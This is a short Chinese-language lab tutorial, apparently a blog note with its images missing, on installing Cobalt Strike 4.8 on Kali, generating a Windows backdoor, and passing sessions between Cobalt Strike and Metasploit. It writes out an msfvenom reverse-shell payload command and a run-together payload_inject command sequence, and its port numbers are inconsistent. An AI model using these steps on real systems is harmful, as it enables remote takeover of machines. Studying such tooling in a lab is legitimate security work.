Cs安装
Kali的IP:192.168.59.133
在这里我使用的是CS4.8
第一步:先下载cs的安装包
第二步:把cs的安装包复制进kali中【这里我是把cs的安装包放到桌面上的】,打开severs端,进行配置
注意:cs中只能生成win木马
第三步:就打开cs4.8的client端选择vbs启动,输入我们上面配置好了的IP和密码,端口默认50050【端口可以自己改】
第一次使用会出现这个【要确定这个指纹是否与团队服务器启动时显示的指纹相匹配】直接点击“是”就行了。
这个值是与kali中sever端形成的是一样的。
成功进入cs页面。
Cs与msf互联
准备工作
第一步:设置一个监听器【自己去监听shell端口】
打开监听器,有两种形式
形式一:
形式二:
打开完了下面就有一个listen
然后单击“add”新增一个监听器【自己取的名字一定要记住,后面要用】
第二步:上线CS
我们要选择“Beacan HTTP”
有效载荷-》wind可执行程序【版本是64位的就勾选】,生成后门【这里用我自己的本机做实验】上线成功。
在站点管理里面查看我们生成的后门
成功上线。
点击上线会话,鼠标左击选择“会话交互”
输入sleep=0。因为默认是60s回显一次判断是否在线,在这里我们设置为0s就行了。
好了目前我们拿到了一台机器。
1.CS派生MSF
第一步:在MSF中设置监听【IP地址为kali的IP】的payload
下面选项的tcp要把它改为http【不改的话运行就是只接收,不监听】
下面这个是修改后的
第二步:在CS上创建一个“Foreign HTTP”监听器
在cs中输入“spawn”命令
回显,就表示成功了
2.MSF派生CS
第一步:用msf生成反弹shell【端口号改8080】
Payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.59.133 LPORT=1234 -f exe >/home/kali/Desktop/test.exe
第二步:再在msf建立会话
第三步:在cs上设置监听
因为MSF主动去连接CS,所以这里设置反向连接。【这里的地址端口要与我们设置的一样】
第四步:转移msf会话
#使当前会话到后台允许Background【可以使用缩写bg】#使用payload_inject模块,执行之后会在本地产生一个新的Handleruse exploit/windows/local/payload_injectsetpayload windows/meterpreter/reverse_httpset LHOST <CS_IP>#这里的端口填写cs的端口set LPORT <CS_Port> set session <Session_ID> #指定id#设置MSF不启动监听,不然MSF会提示执行成功,但没有会话建立set disablepayloadhandler truerun
第五步:查看上线